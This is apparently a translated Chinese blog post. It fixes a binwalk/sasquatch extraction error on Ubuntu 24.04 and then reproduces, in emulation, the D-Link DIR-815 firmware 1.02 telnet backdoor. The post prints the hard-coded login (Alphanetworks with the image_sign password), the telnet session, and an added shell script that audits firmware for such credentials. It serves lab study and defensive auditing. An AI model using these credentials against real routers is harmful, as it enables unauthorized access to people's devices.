[Original] Ubuntu 24.04: binwalk leaves squashfs-root empty, plus reproducing the D-Link DIR-815 backdoor vulnerability
Ubuntu 24.04: binwalk leaves the squashfs-root folder empty
While reproducing the D-Link DIR-815 backdoor vulnerability today, binwalk extracted the D-Link version 1.02 firmware but left the squashfs-root folder empty.
First make sure squashfs-tools is installed; if it is not, install it with:
```shell
sudo apt install squashfs-tools
```
When extracting the firmware:
```shell
binwalk -Me dir815_FW_102.bin
```
the reported error is:
```text
WARNING: Extractor.execute failed to run external extractor 'sasquatch -p 1 -le -d 'squashfs-root' '%e'': [Errno 2] No such file or directory: 'sasquatch', 'sasquatch -p 1 -le -d 'squashfs-root' '%e'' might not be installed correctly
WARNING: Extractor.execute failed to run external extractor 'sasquatch -p 1 -be -d 'squashfs-root' '%e'': [Errno 2] No such file or directory: 'sasquatch', 'sasquatch -p 1 -be -d 'squashfs-root' '%e'' might not be installed correctly
983180 0xF008C Squashfs filesystem, little endian, version 4.0, compression:lzma, size: 2783169 bytes, 1526 inodes, blocksize: 262144 bytes, created: 2012-01-19 04:03:49
```
The cause is a missing tool named sasquatch. sasquatch is a component (plugin) for unpacking SquashFS file systems, a read-only file system commonly found on embedded devices; when binwalk detects a SquashFS image inside the firmware it calls sasquatch to extract its contents.
```shell
git clone https://github.com/devttys0/sasquatch
cd sasquatch && ./build.sh
```
After installing it, you will most likely hit the following build error:
```text
unsquashfs.c:1835:5: error: this ‘if’ clause does not guard... [-Werror=misleading-indentation]
 1835 |     if(swap)
      |     ^~
unsquashfs.c:1841:9: note: ...this statement, but the latter is misleadingly indented as if it were guarded by the ‘if’
 1841 |         read_fs_bytes(fd, SQUASHFS_START, sizeof(struct squashfs_super_block),
      |         ^~~~~~~~~~~~~
cc1: all warnings being treated as errors
make: *** [<builtin>: unsquashfs.o] Error 1
```
This is the compiler flagging an ambiguity in the code. After reading the source, it turns out to be a braces ({}) issue, and fixing that only produced further errors. There is a usable fix; if you are interested, see:
```text
https://github.com/devttys0/sasquatch/pull/56
```
The concrete solution is:
```shell
git clone https://github.com/devttys0/sasquatch
cd sasquatch && git pull origin pull/56/head && ./build.sh
```
Bonus: reproducing the D-Link DIR-815 backdoor vulnerability
For the D-Link DIR-815 router, firmware version 1.02, the dir815_FW_102.bin firmware image can be downloaded from:
```text
https://legacyfiles.us.dlink.com/DIR-815/REVA/FIRMWARE/
```
```shell
➜ binwalk -Me dir815_FW_102.bin
```
After binwalk has split the image apart, several directories with the .extracted suffix appear. Look through them one by one; mine was in:
```shell
cd _dir815_FW_102.bin-2.extracted
```
The firmwalker tool is needed:
```shell
git clone https:
cd firmwalker
```
Use firmwalker to gather information and save the results to dir815.txt:
```shell
./firmwalker.sh ../squashfs-root ./dir815.txt
```
Pay particular attention to the startup scripts in init0.d:
```text
t/etc/init0.d/S80telnetd.sh
```
Then audit the code:
```sh
➜ squashfs-root git:(master) ✗ cat etc/init0.d/S80telnetd.sh
#!/bin/sh
echo [$0]: $1 ... > /dev/console
if [ "$1" = "start" ]; then
    if [ -f "/usr/sbin/login" ]; then
        image_sign=`cat /etc/config/image_sign`
        telnetd -l /usr/sbin/login -u Alphanetworks:$image_sign -i br0 &
    else
        telnetd &
    fi
else
    killall telnetd
fi
```
The password is the content of image_sign:
```shell
➜ squashfs-root cat ./etc/config/image_sign
wrgnd08_dlob_dir815
```
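To catch this kind of backdoor across a whole extracted root filesystem rather than by reading init scripts one at a time, here is an added example (not part of the original post, nor of the firmwalker project): a POSIX shell audit that finds init scripts starting telnetd with a hard-coded `-u user:password` and resolves a password that the script reads from a file with `cat`, the way S80telnetd.sh reads /etc/config/image_sign. The function names and the script file name audit_telnetd.sh are my own, and the rootfs the self-test builds is constructed to mirror the DIR-815 files shown above.

```shell
#!/bin/sh
# Added example: audit an extracted firmware root for init scripts that start
# telnetd with a hard-coded login (-u user:password), as S80telnetd.sh does.

# Build a constructed rootfs mirroring the DIR-815 files above (self-test input).
make_sample_rootfs() {
  root=$1
  mkdir -p "$root/etc/init0.d" "$root/etc/config"
  printf 'wrgnd08_dlob_dir815\n' > "$root/etc/config/image_sign"
  cat > "$root/etc/init0.d/S80telnetd.sh" <<'EOF'
#!/bin/sh
if [ "$1" = "start" ]; then
    image_sign=`cat /etc/config/image_sign`
    telnetd -l /usr/sbin/login -u Alphanetworks:$image_sign -i br0 &
fi
EOF
}

# For every "telnetd ... -u user:pass" under $1/etc print: script user password.
# A password given as $var is resolved when the same script sets var=`cat /file`
# or var=$(cat /file); the file is then read relative to the extracted root.
find_hardcoded_telnetd() {
  root=$1
  grep -rl 'telnetd' "$root/etc" 2>/dev/null | while read -r script; do
    grep -E 'telnetd.*-u[[:space:]]+[^[:space:]]+' "$script" | while read -r line; do
      cred=$(printf '%s\n' "$line" | sed -E 's/.*-u[[:space:]]+([^[:space:]]+).*/\1/')
      user=${cred%%:*}
      pass=${cred#*:}
      case $pass in
        '$'*)
          var=${pass#\$}; var=${var#\{}; var=${var%\}}
          file=$(sed -nE "s/^[[:space:]]*$var=[\`\$(]+cat[[:space:]]+([^\`)]+).*/\1/p" "$script" | head -n1)
          if [ -n "$file" ] && [ -f "$root$file" ]; then
            pass=$(head -n1 "$root$file")
          else
            pass="<unresolved:$pass>"
          fi
          ;;
      esac
      rel=${script#"$root"}
      printf '%s %s %s\n' "$rel" "$user" "$pass"
    done
  done
}

# Stand-alone use: ./audit_telnetd.sh ./squashfs-root
if [ -n "${1:-}" ]; then find_hardcoded_telnetd "$1"; fi
```

Against the DIR-815 rootfs it prints `/etc/init0.d/S80telnetd.sh Alphanetworks wrgnd08_dlob_dir815`, so the finding and the credential it exposes land in one line that can be diffed across firmware versions.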
Download the FirmAE tool to emulate the firmware:
```shell
git clone --recursive https:
./download.sh
./install.sh
./init.sh
```
Once installed, start it:
```shell
sudo ./run.sh -r dir815 ./dir815_FW_102.bin
```
Result:
```text
➜ FirmAE git:(master) ✗ sudo ./run.sh -r dir815 ./dir815_FW_102.bin
[sudo] password for ra1ny:
[*] ./dir815_FW_102.bin emulation start!!!
[*] Extract done!!!
[+] get architecture done!!!
[+] Start emulation!!!
[IID] 2
[MODE] run
[*] ./dir815_FW_102.bin already succeed emulation!!!
[+] Network reachable on 192.168.0.1!
[+] Web service on 192.168.0.1
Creating TAP device tap2_0...
Set 'tap2_0' persistent and owned by uid 0
Bringing up TAP device...
Starting emulation of firmware... 192.168.0.1 true true 5.169506216 25.379649267
```
```text
➜ ~ nmap 192.168.0.1
Starting Nmap 7.94SVN ( https:
Nmap scan report for 192.168.0.1
Host is up (0.0064s latency).
Not shown: 996 closed tcp ports (conn-refused)
PORT      STATE SERVICE
23/tcp    open  telnet
53/tcp    open  domain
80/tcp    open  http
49152/tcp open  unknown
Nmap done: 1 IP address (1 host up) scanned in 0.09 seconds
```
Then log in via telnet.
```text
➜ ~ telnet 192.168.0.1
Trying 192.168.0.1...
Connected to 192.168.0.1.
Escape character is '^]'.
login: Alphanetworks
Password: wrgnd08_dlob_dir815
/
root       www        sys        lib        dev
run        var        sbin       htdocs     bin
etc_ro     usr        proc       home       lost+found
firmadyne  tmp        mnt        etc
```
Reference link:
The reproduction process follows the book 《物联网安全漏洞挖掘实战》 (Practical IoT Security Vulnerability Discovery), edited by 崔洪权 (Cui Hongquan).